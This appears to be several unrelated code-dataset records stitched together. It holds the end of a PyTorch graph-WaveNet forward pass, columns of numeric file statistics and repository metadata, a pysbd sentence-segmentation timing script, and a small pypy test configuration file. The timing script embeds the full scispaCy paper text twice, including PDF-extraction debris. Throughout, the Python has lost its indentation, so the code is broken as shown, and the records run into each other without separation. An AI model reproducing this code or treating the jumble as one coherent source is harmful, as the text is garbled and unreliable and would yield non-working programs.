nodevecInit_1 = self.emb1(self.idx) # (D, node_dim=residual_channels)
nodevecInit_2 = self.emb2(self.idx) # (D, node_dim=residual_channels)
# WaveNet layers
for i in range(self.blocks * self.layers):
residual = x
# dilated convolution
filter = self.filter_convs[i](residual) # kernel=(1, 2)
filter = torch.tanh(filter)
gate = self.gate_convs[i](residual) # kernel=(1,2)
gate = torch.sigmoid(gate)
# x=filter=gate: (B, residual_size, D, F)
x = filter * gate
# ***************** construct dynamic graphs from e ***************** #
# print("x.size: {}, support0: {}, support1: {}".format(x.size(), self.supports[0].size(), self.supports[1].size()))
'''filter1 = self.GCN1_1(x, [self.supports[0]]) + self.GCN1_2(x, [
self.supports[1]]) # (N, residual_channels, D, L)
filter2 = self.GCN2_1(x, [self.supports[0]]) + self.GCN2_2(x, [
self.supports[1]]) # (N, residual_channels, D, L)'''
filter1 = self.GCN1_1(x, [self.supports[0]]) # (N, residual_channels, D, L)
filter2 = self.GCN2_1(x, [self.supports[1]]) # (N, residual_channels, D, L)
filter1 = filter1.permute((0, 3, 2, 1)).contiguous() # (N, L, D, residual_channels)
filter2 = filter2.permute((0, 3, 2, 1)).contiguous() # (N, L, D, residual_channels)
nodevec1 = torch.tanh(self.alpha * torch.mul(nodevecInit_1, filter1)) # (N, L, D, residual_channels)
nodevec2 = torch.tanh(self.alpha * torch.mul(nodevecInit_2, filter2))
# objective: construct "support/A" with size (B, D, D, L)
a = torch.matmul(nodevec1, nodevec2.transpose(2, 3)) - torch.matmul(
nodevec2, nodevec1.transpose(2, 3)) # (B, L, D, D)
adj = F.relu(torch.tanh(self.alpha * a))
mask = torch.zeros(adj.size(0), adj.size(1), adj.size(2), adj.size(3)).to(self.device)
mask.fill_(float('0'))
s1, t1 = adj.topk(20, -1)
mask.scatter_(-1, t1, s1.fill_(1))
adj = adj * mask
adp = self.preprocessing(adj)
adpT = self.preprocessing(adj.transpose(2, 3))
adp = adp.permute((0, 2, 3, 1)).contiguous() # (B, D, D, L)
adpT = adpT.permute((0, 2, 3, 1)).contiguous()
#new_supports = [adp, adpT, self.supports[0], self.supports[1]] # dynamic and pre-defined graph
new_supports = [adp, adpT]
# parametrized skip connection
#x = F.dropout(x, self.dropout)
s = x
s = self.skip_convs[i](s)
try:
skip = skip[:, :, :, -s.size(3):]
except:
skip = 0
skip = s + skip
if self.gcn_bool and self.supports is not None:
if self.addaptadj:
# x: (B, residual_size, D, F)
#print("input.shape 1 is {}".format(x.size()))
x = self.gconv[i](x, new_supports)
#print("input.shape 2 is {}".format(x.size()))
else:
x = self.gconv[i](x, self.supports)
else:
x = self.residual_convs[i](x)
x = x + residual[:, :, :, -x.size(3):]
x = self.bn[i](x)
skip = self.skipE(x) + skip
x = F.relu(skip)
x = F.relu(self.end_conv_1(x)) # [N, skip_channels, D, 1] -> [N, end_channels, D, 1]
x = self.end_conv_2(x) # [N, end_channels, D, 1] -> [N, L, D, 1]
x = torch.squeeze(x, dim=-1) # [N, L, D]
return x.contiguous()
| 43.720657
| 246
| 0.538631
| 2,322
| 18,625
| 4.158484
| 0.099914
| 0.067937
| 0.022784
| 0.031483
| 0.81483
| 0.802299
| 0.78169
| 0.758389
| 0.744201
| 0.726491
| 0
| 0.026996
| 0.341691
| 18,625
| 425
| 247
| 43.823529
| 0.760542
| 0.150658
| 0
| 0.704797
| 0
| 0
| 0.000068
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01845
| false
| 0
| 0.04428
| 0
| 0.081181
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e64b1443296bb3de720e6c1d01cf91511504828b
| 34,438
|
py
|
Python
|
examples/test_timing_script.py
|
nipunsadvilkar/pysbd
|
5905f13be4fc95f407b98392e0ec303617a33d86
|
[
"MIT"
] | 429
|
2019-03-27T14:42:33.000Z
|
2022-03-30T15:52:33.000Z
|
examples/test_timing_script.py
|
nipunsadvilkar/pysbd
|
5905f13be4fc95f407b98392e0ec303617a33d86
|
[
"MIT"
] | 86
|
2017-06-14T17:47:00.000Z
|
2022-02-25T07:44:42.000Z
|
examples/test_timing_script.py
|
nipunsadvilkar/pysbd
|
5905f13be4fc95f407b98392e0ec303617a33d86
|
[
"MIT"
] | 55
|
2019-04-16T17:17:39.000Z
|
2022-03-09T20:12:48.000Z
|
text = "1 Introduction The publication rate in the medical and biomedical sciences is growing at an exponential rate (Bornmann and Mutz, 2014). The information overload problem is widespread across academia, but is particularly apparent in the biomedical sciences, where individual papers may contain specific discoveries relating to a dizzying variety of genes, drugs, and proteins. In order to cope with the sheer volume of new scientific knowledge, there have been many attempts to automate the process of extracting entities, relations, protein interactions and other structured knowledge from scientific papers (Wei et al., 2016; Ammar et al., 2018; Poon et al., 2014). Although there exists a wealth of tools for processing biomedical text, many focus primarily on entity linking, negation detection and abbreviation detection. MetaMap and MetaMapLite (Aronson, 2001; Demner-Fushman et al., 2017), the two most widely used and supported tools for biomedical text processing, consider additional features, such as negation detection and acronym resolution. However, tools which cover more classical natural language processing (NLP) tasks such as the GENIA tagger (Tsuruoka et al., 2005; Tsuruoka and Tsujii, 2005) and phrase structure parsers such as those presented in (McClosky and Charniak, 2008) typically do not make use of new research innovations such as word representations or neural networks. In this paper, we introduce scispaCy, a specialized NLP library for processing biomedical texts which builds on the robust spaCy library,1 and document its performance relative to state of the art models for part of speech (POS) tagging, dependency parsing, named entity recognition (NER) and sentence segmentation. Specifically, we: • Release a reformatted version of the GENIA 1.0 (Kim et al., 2003) corpus converted into Universal Dependencies v1.0 and aligned 1spacy.io ar X iv :1 90 2. 07 66 9v 2 [ cs .C L ] 2 1 Fe b 20 19 with the original text from the PubMed abstracts. • Benchmark 9 named entity recognition models for more specific entity extraction applications demonstrating competitive performance when compared to strong baselines. • Release and evaluate two fast and convenient pipelines for biomedical text, which include tokenization, part of speech tagging, dependency parsing and named entity recognition. 2 Overview of (sci)spaCy In this section, we briefly describe the models used in the spaCy library and describe how we build on them in scispaCy. spaCy. The spaCy library (Honnibal and Montani, 2017)2 provides a variety of practical tools for text processing in multiple languages. Their models have emerged as the defacto standard for practical NLP due to their speed, robustness and close to state of the art performance. As the spaCy models are popular and the spaCy API is widely known to many potential users, we choose to build upon the spaCy library for creating a biomedical text processing pipeline. scispaCy. Our goal is to develop scispaCy as a robust, efficient and performant NLP library to satisfy the primary text processing needs in the biomedical domain. In this release of scispaCy, we retrain spaCy3 models for POS tagging, dependency parsing, and NER using datasets relevant to biomedical text, and enhance the tokenization module with additional rules. scispaCy contains two core released packages: en core sci sm and en core sci md. Models in the en core sci md package have a larger vocabulary and include word vectors, while those in en core sci sm have a smaller vocabulary and do not include word vectors, as shown in Table 1. Processing Speed. To emphasize the efficiency and practical utility of the end-to-end pipeline provided by scispaCy packages, we perform a speed comparison with several other publicly available processing pipelines for biomedical text using 10k randomly selected PubMed abstracts. We report 2Source code at https://github.com/ explosion/spaCy 3scispaCy models are based on spaCy version 2.0.18 results with and without segmenting the abstracts into sentences since some of the libraries (e.g., GENIA tagger) are designed to operate on sentences. As shown in Table 2, both models released in scispaCy demonstrate competitive speed to pipelines written in C++ and Java, languages designed for production settings. Whilst scispaCy is not as fast as pipelines designed for purely production use-cases (e.g., NLP4J), it has the benefit of straightforward integration with the large ecosystem of Python libraries for machine learning and text processing. Although the comparison in Table 2 is not an apples to apples comparison with other frameworks (different tasks, implementation languages etc), it is useful to understand scispaCy’s runtime in the context of other pipeline components. Running scispaCy models in addition to standard Entity Linking software such as MetaMap would result in only a marginal increase in overall runtime. In the following section, we describe the POS taggers and dependency parsers in scispaCy. 3 POS Tagging and Dependency Parsing The joint POS tagging and dependency parsing model in spaCy is an arc-eager transition-based parser trained with a dynamic oracle, similar to (Goldberg and Nivre, 2012). Features are CNN representations of token features and shared across all pipeline models (Kiperwasser and Goldberg, 2016; Zhang and Weiss, 2016). Next, we describe the data we used to train it in scispaCy. 3.1 Datasets GENIA 1.0 Dependencies. To train the dependency parser and part of speech tagger in both released models, we convert the treebank of (McClosky and Charniak, 2008),4 which is based on the GENIA 1.0 corpus (Kim et al., 2003), to Universal Dependencies v1.0 using the Stanford Dependency Converter (Schuster and Manning, 2016). As this dataset has POS tags annotated, we use it to train the POS tagger jointly with the dependency parser in both released models. As we believe the Universal Dependencies converted from the original GENIA 1.0 corpus are generally useful, we have released them as a separate contribution of this paper.5 In this data release, we also align the converted dependency parses to their original text spans in the raw, untokenized abstracts from the original release,6 and include the PubMed metadata for the abstracts which was discarded in the GENIA corpus released by McClosky and Charniak (2008). We hope that this raw format can emerge as a resource for practical evaluation in the biomedical domain of core NLP tasks such as tokenization, sentence segmentation and joint models of syntax. Finally, we also retrieve from PubMed the original metadata associated with each abstract. This includes relevant named entities linked to their Medical Subject Headings (MeSH terms) as well as chemicals and drugs linked to a variety of ontologies, as well as author metadata, publication dates, citation statistics and journal metadata. We hope that the community can find interesting problems for which such natural supervision can be used. 4https://nlp.stanford.edu/˜mcclosky/ biomedical.html 5Available at https://github.com/allenai/ genia-dependency-trees 6Available at http://www.geniaproject.org/ OntoNotes 5.0. To increase the robustness of the dependency parser and POS tagger to generic text, we make use of the OntoNotes 5.0 corpus7 when training the dependency parser and part of speech tagger (Weischedel et al., 2011; Hovy et al., 2006). The OntoNotes corpus consists of multiple genres of text, annotated with syntactic and semantic information, but we only use POS and dependency parsing annotations in this work. 3.2 Experiments We compare our models to the recent survey study of dependency parsing and POS tagging for biomedical data (Nguyen and Verspoor, 2018) in Tables 3 and 4. POS tagging results show that both models released in scispaCy are competitive with state of the art systems, and can be considered of equivalent practical value. In the case of dependency parsing, we find that the Biaffine parser of (Dozat and Manning, 2016) outperforms the scispaCy models by a margin of 2-3%. However, as demonstrated in Table 2, the scispaCy models are 7Instructions for download at http://cemantix. org/data/ontonotes.html approximately 9x faster due to the speed optimizations in spaCy. Robustness to Web Data. A core principle of the scispaCy models is that they are useful on a wide variety of types of text with a biomedical focus, such as clinical notes, academic papers, clinical trials reports and medical records. In order to make our models robust across a wider range of domains more generally, we experiment with incorporating training data from the OntoNotes 5.0 corpus when training the dependency parser and POS tagger. Figure 2 demonstrates the effectiveness of adding increasing percentages of web data, showing substantially improved performance on OntoNotes, at no reduction in performance on biomedical text. Note that mixing in web text during training has been applied to previous systems - the GENIA Tagger (Tsuruoka et al., 2005) also employs this technique. 4 Named Entity Recognition The NER model in spaCy is a transition-based system based on the chunking model from (Lample et al., 2016). Tokens are represented as hashed, embedded representations of the prefix, suffix, shape and lemmatized features of individual words. Next, we describe the data we used to train NER models in scispaCy. 4.1 Datasets The main NER model in both released packages in scispaCy is trained on the mention spans in the MedMentions dataset (Murty et al., 2018). Since the MedMentions dataset was originally designed for entity linking, this model recognizes a wide variety of entity types, as well as non-standard syntactic phrases such as verbs and modifiers, but the model does not predict the entity type. In order to provide for users with more specific requirements around entity types, we release four additional packages en ner {bc5cdr|craft |jnlpba|bionlp13cg} md with finer-grained NER models trained on BC5CDR (for chemicals and diseases; Li et al., 2016), CRAFT (for cell types, chemicals, proteins, genes; Bada et al., 2011), JNLPBA (for cell lines, cell types, DNAs, RNAs, proteins; Collier and Kim, 2004) and BioNLP13CG (for cancer genetics; Pyysalo et al., 2015), respectively. 4.2 Experiments As NER is a key task for other biomedical text processing tasks, we conduct a through evaluation of the suitability of scispaCy to provide baseline performance across a wide variety of datasets. In particular, we retrain the spaCy NER model on each of the four datasets mentioned earlier (BC5CDR, CRAFT, JNLPBA, BioNLP13CG) as well as five more datasets in Crichton et al. (2017): AnatEM, BC2GM, BC4CHEMD, Linnaeus, NCBI-Disease. These datasets cover a wide variety of entity types required by different biomedical domains, including cancer genetics, disease-drug interactions, pathway analysis and trial population extraction. Additionally, they vary considerably in size and number of entities. For example, BC4CHEMD (Krallinger et al., 2015) has 84,310 annotations while Linnaeus (Gerner et al., 2009) only has 4,263. BioNLP13CG (Pyysalo et al., 2015) annotates 16 entity types while five of the datasets only annotate a single entity type.8 Table 5 provides a through comparison of the scispaCy NER models compared to a variety of models. In particular, we compare the models to strong baselines which do not consider the use of 1) multi-task learning across multiple datasets and 2) semi-supervised learning via large pretrained language models. Overall, we find that the scispaCy models are competitive baselines for 5 of the 9 datasets. Additionally, in Table 6 we evaluate the recall of the pipeline mention detector available in both 8For a detailed discussion of the datasets and their creation, we refer the reader to https://github.com/ cambridgeltl/MTL-Bioinformatics-2016/ blob/master/Additional%20file%201.pdf scispaCy models (trained on the MedMentions dataset) against all 9 specialised NER datasets. Overall, we observe a modest drop in average recall when compared directly to the MedMentions results in Table 7, but considering the diverse domains of the 9 specialised NER datasets, achieving this level of recall across datasets is already nontrivial. 5 Sentence Segmentation and Citation Handling Accurate sentence segmentation is required for many practical applications of natural language processing. Biomedical data presents many difficulties for standard sentence segmentation algorithms: abbreviated names and noun compounds containing punctuation are more common, whilst the wide range of citation styles can easily be misidentified as sentence boundaries. We evaluate sentence segmentation using both sentence and full-abstract accuracy when segmenting PubMed abstracts from the raw, untokenized GENIA development set (the Sent/Abstract columns in Table 8). Additionally, we examine the ability of the segmentation learned by our model to generalise to the body text of PubMed articles. Body text is typically more complex than abstract text, but in particular, it contains citations, which are considerably less frequent in abstract text. In order to examine the effectiveness of our models in this scenario, we design the following synthetic experiment. Given sentences from (Anonymous, 2019)9 which were originally designed for citation intent prediction, we run these sentences individually through our models. As we know that these sentences should be single sentences, we can simply count the frequency with which our models segment the individual sentences containing citations into multiple sentences (the Citation column in Table 8). As demonstrated by Table 8, training the dependency parser on in-domain data (both the scispaCy models) completely obviates the need for rule-based sentence segmentation. This is a positive result - rule based sentence segmentation is a brittle, time consuming process, which we have replaced with a domain specific version of an existing pipeline component. Both scispaCy models are released with the custom tokeniser, but without a custom sentence segmenter by default. 6 Related Work Apache cTakes (Savova et al., 2010) was designed specifically for clinical notes rather than the broader biomedical domain. MetaMap and MetaMapLite (Aronson, 2001; Demner-Fushman et al., 2017) from the National Library of 9Paper currently under review. Medicine focus specifically on entity linking using the Unified Medical Language System (UMLS) (Bodenreider, 2004) as a knowledge base. (Buyko et al.) adapt Apache OpenNLP using the GENIA corpus, but their system is not openly available and is less suitable for modern, Python-based workflows. The GENIA Tagger (Tsuruoka et al., 2005) provides the closest comparison to scispaCy due to it’s multi-stage pipeline, integrated research contributions and production quality runtime. We improve on the GENIA Tagger by adding a full dependency parser rather than just noun chunking, as well as improved results for NER without compromising significantly on speed. In more fundamental NLP research, the GENIA corpus (Kim et al., 2003) has been widely used to evaluate transfer learning and domain adaptation. (McClosky et al., 2006) demonstrate the effectiveness of self-training and parse re-ranking for domain adaptation. (Rimell and Clark, 2008) adapt a CCG parser using only POS and lexical categories, while (Joshi et al., 2018) extend a neural phrase structure parser trained on web text to the biomedical domain with a small number of partially annotated examples. These papers focus mainly of the problem of domain adaptation itself, rather than the objective of obtaining a robust, high-performance parser using existing resources. NLP techniques, and in particular, distant supervision have been employed to assist the curation of large, structured biomedical resources. (Poon et al., 2015) extract 1.5 million cancer path- way interactions from PubMed abstracts, leading to the development of Literome (Poon et al., 2014), a search engine for genic pathway interactions and genotype-phenotype interactions. A fundamental aspect of (Valenzuela-Escarcega et al., 2018; Poon et al., 2014) is the use of hand-written rules and triggers for events based on dependency tree paths; the connection to the application of scispaCy is quite apparent. 7 Conclusion In this paper we presented several robust model pipelines for a variety of natural language processing tasks focused on biomedical text. The scispaCy models are fast, easy to use, scalable, and achieve close to state of the art performance. We hope that the release of these models enables new applications in biomedical information extraction whilst making it easy to leverage high quality syntactic annotation for downstream tasks. Additionally, we released a reformatted GENIA 1.0 corpus augmented with automatically produced Universal Dependency annotations and recovered and aligned original abstract metadata. 1 Introduction The publication rate in the medical and biomedical sciences is growing at an exponential rate (Bornmann and Mutz, 2014). The information overload problem is widespread across academia, but is particularly apparent in the biomedical sciences, where individual papers may contain specific discoveries relating to a dizzying variety of genes, drugs, and proteins. In order to cope with the sheer volume of new scientific knowledge, there have been many attempts to automate the process of extracting entities, relations, protein interactions and other structured knowledge from scientific papers (Wei et al., 2016; Ammar et al., 2018; Poon et al., 2014). Although there exists a wealth of tools for processing biomedical text, many focus primarily on entity linking, negation detection and abbreviation detection. MetaMap and MetaMapLite (Aronson, 2001; Demner-Fushman et al., 2017), the two most widely used and supported tools for biomedical text processing, consider additional features, such as negation detection and acronym resolution. However, tools which cover more classical natural language processing (NLP) tasks such as the GENIA tagger (Tsuruoka et al., 2005; Tsuruoka and Tsujii, 2005) and phrase structure parsers such as those presented in (McClosky and Charniak, 2008) typically do not make use of new research innovations such as word representations or neural networks. In this paper, we introduce scispaCy, a specialized NLP library for processing biomedical texts which builds on the robust spaCy library,1 and document its performance relative to state of the art models for part of speech (POS) tagging, dependency parsing, named entity recognition (NER) and sentence segmentation. Specifically, we: • Release a reformatted version of the GENIA 1.0 (Kim et al., 2003) corpus converted into Universal Dependencies v1.0 and aligned 1spacy.io ar X iv :1 90 2. 07 66 9v 2 [ cs .C L ] 2 1 Fe b 20 19 with the original text from the PubMed abstracts. • Benchmark 9 named entity recognition models for more specific entity extraction applications demonstrating competitive performance when compared to strong baselines. • Release and evaluate two fast and convenient pipelines for biomedical text, which include tokenization, part of speech tagging, dependency parsing and named entity recognition. 2 Overview of (sci)spaCy In this section, we briefly describe the models used in the spaCy library and describe how we build on them in scispaCy. spaCy. The spaCy library (Honnibal and Montani, 2017)2 provides a variety of practical tools for text processing in multiple languages. Their models have emerged as the defacto standard for practical NLP due to their speed, robustness and close to state of the art performance. As the spaCy models are popular and the spaCy API is widely known to many potential users, we choose to build upon the spaCy library for creating a biomedical text processing pipeline. scispaCy. Our goal is to develop scispaCy as a robust, efficient and performant NLP library to satisfy the primary text processing needs in the biomedical domain. In this release of scispaCy, we retrain spaCy3 models for POS tagging, dependency parsing, and NER using datasets relevant to biomedical text, and enhance the tokenization module with additional rules. scispaCy contains two core released packages: en core sci sm and en core sci md. Models in the en core sci md package have a larger vocabulary and include word vectors, while those in en core sci sm have a smaller vocabulary and do not include word vectors, as shown in Table 1. Processing Speed. To emphasize the efficiency and practical utility of the end-to-end pipeline provided by scispaCy packages, we perform a speed comparison with several other publicly available processing pipelines for biomedical text using 10k randomly selected PubMed abstracts. We report 2Source code at https://github.com/ explosion/spaCy 3scispaCy models are based on spaCy version 2.0.18 results with and without segmenting the abstracts into sentences since some of the libraries (e.g., GENIA tagger) are designed to operate on sentences. As shown in Table 2, both models released in scispaCy demonstrate competitive speed to pipelines written in C++ and Java, languages designed for production settings. Whilst scispaCy is not as fast as pipelines designed for purely production use-cases (e.g., NLP4J), it has the benefit of straightforward integration with the large ecosystem of Python libraries for machine learning and text processing. Although the comparison in Table 2 is not an apples to apples comparison with other frameworks (different tasks, implementation languages etc), it is useful to understand scispaCy’s runtime in the context of other pipeline components. Running scispaCy models in addition to standard Entity Linking software such as MetaMap would result in only a marginal increase in overall runtime. In the following section, we describe the POS taggers and dependency parsers in scispaCy. 3 POS Tagging and Dependency Parsing The joint POS tagging and dependency parsing model in spaCy is an arc-eager transition-based parser trained with a dynamic oracle, similar to (Goldberg and Nivre, 2012). Features are CNN representations of token features and shared across all pipeline models (Kiperwasser and Goldberg, 2016; Zhang and Weiss, 2016). Next, we describe the data we used to train it in scispaCy. 3.1 Datasets GENIA 1.0 Dependencies. To train the dependency parser and part of speech tagger in both released models, we convert the treebank of (McClosky and Charniak, 2008),4 which is based on the GENIA 1.0 corpus (Kim et al., 2003), to Universal Dependencies v1.0 using the Stanford Dependency Converter (Schuster and Manning, 2016). As this dataset has POS tags annotated, we use it to train the POS tagger jointly with the dependency parser in both released models. As we believe the Universal Dependencies converted from the original GENIA 1.0 corpus are generally useful, we have released them as a separate contribution of this paper.5 In this data release, we also align the converted dependency parses to their original text spans in the raw, untokenized abstracts from the original release,6 and include the PubMed metadata for the abstracts which was discarded in the GENIA corpus released by McClosky and Charniak (2008). We hope that this raw format can emerge as a resource for practical evaluation in the biomedical domain of core NLP tasks such as tokenization, sentence segmentation and joint models of syntax. Finally, we also retrieve from PubMed the original metadata associated with each abstract. This includes relevant named entities linked to their Medical Subject Headings (MeSH terms) as well as chemicals and drugs linked to a variety of ontologies, as well as author metadata, publication dates, citation statistics and journal metadata. We hope that the community can find interesting problems for which such natural supervision can be used. 4https://nlp.stanford.edu/˜mcclosky/ biomedical.html 5Available at https://github.com/allenai/ genia-dependency-trees 6Available at http://www.geniaproject.org/ OntoNotes 5.0. To increase the robustness of the dependency parser and POS tagger to generic text, we make use of the OntoNotes 5.0 corpus7 when training the dependency parser and part of speech tagger (Weischedel et al., 2011; Hovy et al., 2006). The OntoNotes corpus consists of multiple genres of text, annotated with syntactic and semantic information, but we only use POS and dependency parsing annotations in this work. 3.2 Experiments We compare our models to the recent survey study of dependency parsing and POS tagging for biomedical data (Nguyen and Verspoor, 2018) in Tables 3 and 4. POS tagging results show that both models released in scispaCy are competitive with state of the art systems, and can be considered of equivalent practical value. In the case of dependency parsing, we find that the Biaffine parser of (Dozat and Manning, 2016) outperforms the scispaCy models by a margin of 2-3%. However, as demonstrated in Table 2, the scispaCy models are 7Instructions for download at http://cemantix. org/data/ontonotes.html approximately 9x faster due to the speed optimizations in spaCy. Robustness to Web Data. A core principle of the scispaCy models is that they are useful on a wide variety of types of text with a biomedical focus, such as clinical notes, academic papers, clinical trials reports and medical records. In order to make our models robust across a wider range of domains more generally, we experiment with incorporating training data from the OntoNotes 5.0 corpus when training the dependency parser and POS tagger. Figure 2 demonstrates the effectiveness of adding increasing percentages of web data, showing substantially improved performance on OntoNotes, at no reduction in performance on biomedical text. Note that mixing in web text during training has been applied to previous systems - the GENIA Tagger (Tsuruoka et al., 2005) also employs this technique. 4 Named Entity Recognition The NER model in spaCy is a transition-based system based on the chunking model from (Lample et al., 2016). Tokens are represented as hashed, embedded representations of the prefix, suffix, shape and lemmatized features of individual words. Next, we describe the data we used to train NER models in scispaCy. 4.1 Datasets The main NER model in both released packages in scispaCy is trained on the mention spans in the MedMentions dataset (Murty et al., 2018). Since the MedMentions dataset was originally designed for entity linking, this model recognizes a wide variety of entity types, as well as non-standard syntactic phrases such as verbs and modifiers, but the model does not predict the entity type. In order to provide for users with more specific requirements around entity types, we release four additional packages en ner {bc5cdr|craft |jnlpba|bionlp13cg} md with finer-grained NER models trained on BC5CDR (for chemicals and diseases; Li et al., 2016), CRAFT (for cell types, chemicals, proteins, genes; Bada et al., 2011), JNLPBA (for cell lines, cell types, DNAs, RNAs, proteins; Collier and Kim, 2004) and BioNLP13CG (for cancer genetics; Pyysalo et al., 2015), respectively. 4.2 Experiments As NER is a key task for other biomedical text processing tasks, we conduct a through evaluation of the suitability of scispaCy to provide baseline performance across a wide variety of datasets. In particular, we retrain the spaCy NER model on each of the four datasets mentioned earlier (BC5CDR, CRAFT, JNLPBA, BioNLP13CG) as well as five more datasets in Crichton et al. (2017): AnatEM, BC2GM, BC4CHEMD, Linnaeus, NCBI-Disease. These datasets cover a wide variety of entity types required by different biomedical domains, including cancer genetics, disease-drug interactions, pathway analysis and trial population extraction. Additionally, they vary considerably in size and number of entities. For example, BC4CHEMD (Krallinger et al., 2015) has 84,310 annotations while Linnaeus (Gerner et al., 2009) only has 4,263. BioNLP13CG (Pyysalo et al., 2015) annotates 16 entity types while five of the datasets only annotate a single entity type.8 Table 5 provides a through comparison of the scispaCy NER models compared to a variety of models. In particular, we compare the models to strong baselines which do not consider the use of 1) multi-task learning across multiple datasets and 2) semi-supervised learning via large pretrained language models. Overall, we find that the scispaCy models are competitive baselines for 5 of the 9 datasets. Additionally, in Table 6 we evaluate the recall of the pipeline mention detector available in both 8For a detailed discussion of the datasets and their creation, we refer the reader to https://github.com/ cambridgeltl/MTL-Bioinformatics-2016/ blob/master/Additional%20file%201.pdf scispaCy models (trained on the MedMentions dataset) against all 9 specialised NER datasets. Overall, we observe a modest drop in average recall when compared directly to the MedMentions results in Table 7, but considering the diverse domains of the 9 specialised NER datasets, achieving this level of recall across datasets is already nontrivial. 5 Sentence Segmentation and Citation Handling Accurate sentence segmentation is required for many practical applications of natural language processing. Biomedical data presents many difficulties for standard sentence segmentation algorithms: abbreviated names and noun compounds containing punctuation are more common, whilst the wide range of citation styles can easily be misidentified as sentence boundaries. We evaluate sentence segmentation using both sentence and full-abstract accuracy when segmenting PubMed abstracts from the raw, untokenized GENIA development set (the Sent/Abstract columns in Table 8). Additionally, we examine the ability of the segmentation learned by our model to generalise to the body text of PubMed articles. Body text is typically more complex than abstract text, but in particular, it contains citations, which are considerably less frequent in abstract text. In order to examine the effectiveness of our models in this scenario, we design the following synthetic experiment. Given sentences from (Anonymous, 2019)9 which were originally designed for citation intent prediction, we run these sentences individually through our models. As we know that these sentences should be single sentences, we can simply count the frequency with which our models segment the individual sentences containing citations into multiple sentences (the Citation column in Table 8). As demonstrated by Table 8, training the dependency parser on in-domain data (both the scispaCy models) completely obviates the need for rule-based sentence segmentation. This is a positive result - rule based sentence segmentation is a brittle, time consuming process, which we have replaced with a domain specific version of an existing pipeline component. Both scispaCy models are released with the custom tokeniser, but without a custom sentence segmenter by default. 6 Related Work Apache cTakes (Savova et al., 2010) was designed specifically for clinical notes rather than the broader biomedical domain. MetaMap and MetaMapLite (Aronson, 2001; Demner-Fushman et al., 2017) from the National Library of 9Paper currently under review. Medicine focus specifically on entity linking using the Unified Medical Language System (UMLS) (Bodenreider, 2004) as a knowledge base. (Buyko et al.) adapt Apache OpenNLP using the GENIA corpus, but their system is not openly available and is less suitable for modern, Python-based workflows. The GENIA Tagger (Tsuruoka et al., 2005) provides the closest comparison to scispaCy due to it’s multi-stage pipeline, integrated research contributions and production quality runtime. We improve on the GENIA Tagger by adding a full dependency parser rather than just noun chunking, as well as improved results for NER without compromising significantly on speed. In more fundamental NLP research, the GENIA corpus (Kim et al., 2003) has been widely used to evaluate transfer learning and domain adaptation. (McClosky et al., 2006) demonstrate the effectiveness of self-training and parse re-ranking for domain adaptation. (Rimell and Clark, 2008) adapt a CCG parser using only POS and lexical categories, while (Joshi et al., 2018) extend a neural phrase structure parser trained on web text to the biomedical domain with a small number of partially annotated examples. These papers focus mainly of the problem of domain adaptation itself, rather than the objective of obtaining a robust, high-performance parser using existing resources. NLP techniques, and in particular, distant supervision have been employed to assist the curation of large, structured biomedical resources. (Poon et al., 2015) extract 1.5 million cancer path- way interactions from PubMed abstracts, leading to the development of Literome (Poon et al., 2014), a search engine for genic pathway interactions and genotype-phenotype interactions. A fundamental aspect of (Valenzuela-Escarcega et al., 2018; Poon et al., 2014) is the use of hand-written rules and triggers for events based on dependency tree paths; the connection to the application of scispaCy is quite apparent. 7 Conclusion In this paper we presented several robust model pipelines for a variety of natural language processing tasks focused on biomedical text. The scispaCy models are fast, easy to use, scalable, and achieve close to state of the art performance. We hope that the release of these models enables new applications in biomedical information extraction whilst making it easy to leverage high quality syntactic annotation for downstream tasks. Additionally, we released a reformatted GENIA 1.0 corpus augmented with automatically produced Universal Dependency annotations and recovered and aligned original abstract metadata."
import pysbd
import time
import cProfile
from tqdm import tqdm
segmenter = pysbd.Segmenter(language='en', clean=False)
n_trials = 10
times = []
for i in tqdm(range(n_trials)):
start = time.time()
# segments = cProfile.run('segmenter.segment(text)')
segments = segmenter.segment(text)
end = time.time()
times.append(end-start)
print("Total seconds {}".format(sum(times)))
print("Num trials {}".format(n_trials))
print("Average second {}".format(sum(times)/n_trials))
| 1,639.904762
| 33,948
| 0.813781
| 5,389
| 34,438
| 5.20115
| 0.155688
| 0.008563
| 0.008134
| 0.00371
| 0.987763
| 0.987763
| 0.987763
| 0.987763
| 0.987763
| 0.987763
| 0
| 0.022175
| 0.151461
| 34,438
| 21
| 33,949
| 1,639.904762
| 0.936726
| 0.001452
| 0
| 0
| 0
| 0.0625
| 0.988368
| 0.008143
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0.1875
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
05178c7d44b067c167fe229ab177cf37ed5b6ef7
| 156
|
py
|
Python
|
pypy/rlib/rsre/test/conftest.py
|
benoitc/pypy
|
a3e1b12d1d01dc29056b7badc051ffc034297658
|
[
"MIT"
] | 1
|
2020-01-21T11:10:51.000Z
|
2020-01-21T11:10:51.000Z
|
pypy/rlib/rsre/test/conftest.py
|
benoitc/pypy
|
a3e1b12d1d01dc29056b7badc051ffc034297658
|
[
"MIT"
] | null | null | null |
pypy/rlib/rsre/test/conftest.py
|
benoitc/pypy
|
a3e1b12d1d01dc29056b7badc051ffc034297658
|
[
"MIT"
] | null | null | null |
# import the option --viewloops from the JIT
def pytest_addoption(parser):
from pypy.jit.conftest import pytest_addoption
pytest_addoption(parser)
| 26
| 50
| 0.782051
| 21
| 156
| 5.666667
| 0.571429
| 0.378151
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 156
| 5
| 51
| 31.2
| 0.901515
| 0.269231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
